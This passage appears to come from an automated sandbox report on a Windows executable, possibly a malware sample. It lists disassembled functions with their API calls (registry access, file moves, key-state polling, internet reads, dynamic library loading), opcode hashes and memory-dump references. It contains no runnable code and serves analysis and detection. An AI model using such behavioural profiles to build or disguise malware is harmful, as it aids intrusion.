                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID:
                          • API String ID: 3488606520-0
                          • Opcode ID: c5f08772b39a9a03649a4166f7bfe5bd4e31a038b7cb7bad9eaa1bdcfae7ca56
                          • Instruction ID: f8fad2e1d4e6980dd9bd6bd259257e0959049822c439ae14bdf3004d80d20827
                          • Opcode Fuzzy Hash: c5f08772b39a9a03649a4166f7bfe5bd4e31a038b7cb7bad9eaa1bdcfae7ca56
                          • Instruction Fuzzy Hash: 60A1B371644301EFE720EF18C886F2AB7E1AF44714F14895DF9599B2D2DBB4EC418B92
                          Function 0073BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
                          • _free.LIBCMT ref: 0073BB7F
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073BD4B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API String ID: 1286116820-0
                          • Opcode ID: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
                          • Instruction ID: bac40bd7aa8541df28e7fc677f3034bd5546bc63c19c0fb4294eea050f608eec
                          • Opcode Fuzzy Hash: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
                          • Instruction Fuzzy Hash: 8351E7B1A00219EFEB20EF659C8596AB7BCFF40310F50426BE654D7293EB385E41CB64
                          Function 0076E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • lstrcmpiW.KERNEL32(?,?), ref: 0076E473
                          • MoveFileW.KERNEL32(?,?), ref: 0076E4AC
                          • _wcslen.LIBCMT ref: 0076E5EB
                          • _wcslen.LIBCMT ref: 0076E603
                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0076E650
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                          • String ID:
                          • API String ID: 3183298772-0
                          • Opcode ID: a714a2c2da3f8ce65dedd3b61ca3fda0d217f34d985d569281fc90b929622cd9
                          • Instruction ID: ecc91e904acd14da7229513a3ccd936331f68caf4d283c373e0fbe6a6ffd035c
                          • Opcode Fuzzy Hash: a714a2c2da3f8ce65dedd3b61ca3fda0d217f34d985d569281fc90b929622cd9
                          • Instruction Fuzzy Hash: BC5166B2508385DBC724DBA0DC859DF77DCAF85340F00491EFA8AD3191EF78A5888766
                          Function 0078B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BAA5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BB00
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0078BB63
                          • RegCloseKey.ADVAPI32(?,?), ref: 0078BBA6
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078BBB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                          • String ID:
                          • API String ID: 826366716-0
                          • Opcode ID: 28941b8f2befef32039ea5bb8332533311a82552d9e5687f1d513d45bd270ef2
                          • Instruction ID: 10990ec220ca620360a3ca1a12d77c24da06dca8fb1a175a5aec020b3a9d6d6e
                          • Opcode Fuzzy Hash: 28941b8f2befef32039ea5bb8332533311a82552d9e5687f1d513d45bd270ef2
                          • Instruction Fuzzy Hash: 7361B571208241EFD714EF24C894E2ABBE5FF84308F54855DF4998B2A2DB39ED45CB92
                          Function 00768BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00768BCD
                          • VariantClear.OLEAUT32 ref: 00768C3E
                          • VariantClear.OLEAUT32 ref: 00768C9D
                          • VariantClear.OLEAUT32(?), ref: 00768D10
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00768D3B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          • String ID:
                          • API String ID: 4136290138-0
                          • Opcode ID: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
                          • Instruction ID: fac5c2c8466684a860d424a890208650cad2e5d0e5774b5b979c110e07354f56
                          • Opcode Fuzzy Hash: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
                          • Instruction Fuzzy Hash: 35515BB5A00619EFCB14CF68C894AAABBF4FF8D310B158559ED16DB350E734E911CBA0
                          Function 00778AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00778BAE
                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00778BDA
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00778C32
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00778C57
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00778C5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          • String ID:
                          • API String ID: 2832842796-0
                          • Opcode ID: f51b3da9adc83e4ca1bd28e7e27fbabb8dc413fafebc29bc5a40a5a71e0cc39b
                          • Instruction ID: 0ca512a6b5754af908934a7ef01f13fe9aaa370e07ea5dd7b97fad5e3acbcca5
                          • Opcode Fuzzy Hash: f51b3da9adc83e4ca1bd28e7e27fbabb8dc413fafebc29bc5a40a5a71e0cc39b
                          • Instruction Fuzzy Hash: 75513D75A00215DFCB05DF54C885AA9BBF5FF48314F08C499E8496B3A2CB39ED51CB91
                          Function 00788EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00788F40
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00788FD0
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00788FEC
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00789032
                          • FreeLibrary.KERNEL32(00000000), ref: 00789052
                            • Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00771043,?,7529E610), ref: 0071F6E6
                            • Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0075FA64,00000000,00000000,?,?,00771043,?,7529E610,?,0075FA64), ref: 0071F70D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                          • String ID:
                          • API String ID: 666041331-0
                          • Opcode ID: fcdef22c87b36ef7d674861c64c863298e1efcfade26d44f3317abab7473e1f7
                          • Instruction ID: 6139136ca3023f9d7e806d8968d8df57ca22782c2140f9e927b50d89bc061c17
                          • Opcode Fuzzy Hash: fcdef22c87b36ef7d674861c64c863298e1efcfade26d44f3317abab7473e1f7
                          • Instruction Fuzzy Hash: 2C514F34640205DFCB15EF54C4848ADBBF1FF49314F488199E906AB3A2DB35ED85CB91
                          Function 00796B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00796C33
                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00796C4A
                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00796C73
                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0077AB79,00000000,00000000), ref: 00796C98
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00796CC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long$MessageSendShow
                          • String ID:
                          • API String ID: 3688381893-0
                          • Opcode ID: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
                          • Instruction ID: 386ac456419f550083c8f96c188c07b722946528268a34c4a79d107658b95568
                          • Opcode Fuzzy Hash: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
                          • Instruction Fuzzy Hash: 4D410235A00104AFDF25DF28DC58FA97BA5EB0A350F154369F899A72E0D379FD41CA60
                          Function 00732051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
                          • Instruction ID: ee61e565445b6ce8f33f9b46c9b7991c1f7aca6de9e4fada49d25c48b08dd36d
                          • Opcode Fuzzy Hash: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
                          • Instruction Fuzzy Hash: A441E232A00214EFDB24DF78C984A5EB3B5EF88710F1545A8E515EB393EA35AD02CB80
                          Function 0071912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00719141
                          • ScreenToClient.USER32(00000000,?), ref: 0071915E
                          • GetAsyncKeyState.USER32(00000001), ref: 00719183
                          • GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
                          • Instruction ID: 13037d6d5f78c8aab60e537b70a0dd6137457f0badf3cf6f9fde98bc9879239c
                          • Opcode Fuzzy Hash: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
                          • Instruction Fuzzy Hash: 3641903190850AFBDF099F68D858BEEB774FB45320F208215E925A32D0C7786D95DB51
                          Function 00773874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetInputState.USER32 ref: 007738CB
                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00773922
                          • TranslateMessage.USER32(?), ref: 0077394B
                          • DispatchMessageW.USER32(?), ref: 00773955
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                          • String ID:
                          • API String ID: 2256411358-0
                          • Opcode ID: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
                          • Instruction ID: a1f7229ab3397f84c5af050531f318084c801bfa558bd877ac24d9756aad5649
                          • Opcode Fuzzy Hash: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
                          • Instruction Fuzzy Hash: 0531C870505341AEEF25CB749848BB637B4AB05388F44C56AD56A82190D3BCB685EF25
                          Function 0077CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0077CF38
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0077CF6F
                          • GetLastError.KERNEL32(?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFB4
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFC8
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                          • String ID:
                          • API String ID: 3191363074-0
                          • Opcode ID: 86ec769f29c3cce0e4aa0df6d97b6f74882d1f69888f43eec56ab1579db341dd
                          • Instruction ID: 75b1abe5a69bf2587a15bfc7b923acd7882b3dcc692cf74227f5dd50c41f0035
                          • Opcode Fuzzy Hash: 86ec769f29c3cce0e4aa0df6d97b6f74882d1f69888f43eec56ab1579db341dd
                          • Instruction Fuzzy Hash: F1315072600605EFDF21DFA5D8849ABBBF9EF18390B10842EF50AD2141D738AE41DB60
                          Function 00761901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00761915
                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 007619C1
                          • Sleep.KERNEL32(00000000,?,?,?), ref: 007619C9
                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 007619DA
                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007619E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
                          • Instruction ID: 5279f8906151d7d9ad0e534f90edd0595dff31f2d542e0e288ae89edd62558ec
                          • Opcode Fuzzy Hash: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
                          • Instruction Fuzzy Hash: 6731AD71A00259EFCB00CFA8C99DADE3BB5EB04315F548269FD22A72D1C774AD44CB90
                          Function 00795706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00795745
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0079579D
                          • _wcslen.LIBCMT ref: 007957AF
                          • _wcslen.LIBCMT ref: 007957BA
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen
                          • String ID:
                          • API String ID: 763830540-0
                          • Opcode ID: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
                          • Instruction ID: add33c7ea94da819aeeecdf907d179e4338128d1d194a7864bad4d8a9ed9a634
                          • Opcode Fuzzy Hash: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
                          • Instruction Fuzzy Hash: 2B21A771904628EADF21CFA0EC44EED7778FF04720F108156E929DA191D7789A85CF50
                          Function 00780930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00780951
                          • GetForegroundWindow.USER32 ref: 00780968
                          • GetDC.USER32(00000000), ref: 007809A4
                          • GetPixel.GDI32(00000000,?,00000003), ref: 007809B0
                          • ReleaseDC.USER32(00000000,00000003), ref: 007809E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: b6e7d64d8528004d6d818d9ee810b456108f207aebacf566bf9acea490aaac26
                          • Instruction ID: f2e4edb95af20e7f85891a9c3f94ae7b52f556ca58356704dcc23a3eb4a1a558
                          • Opcode Fuzzy Hash: b6e7d64d8528004d6d818d9ee810b456108f207aebacf566bf9acea490aaac26
                          • Instruction Fuzzy Hash: 6921A435600204EFDB14EF68C848A6EB7E5EF48740F04C169F84A97352DB78AC04CB90
                          Function 0073CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0073CDC6
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0073CDE9
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0073CE0F
                          • _free.LIBCMT ref: 0073CE22
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0073CE31
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
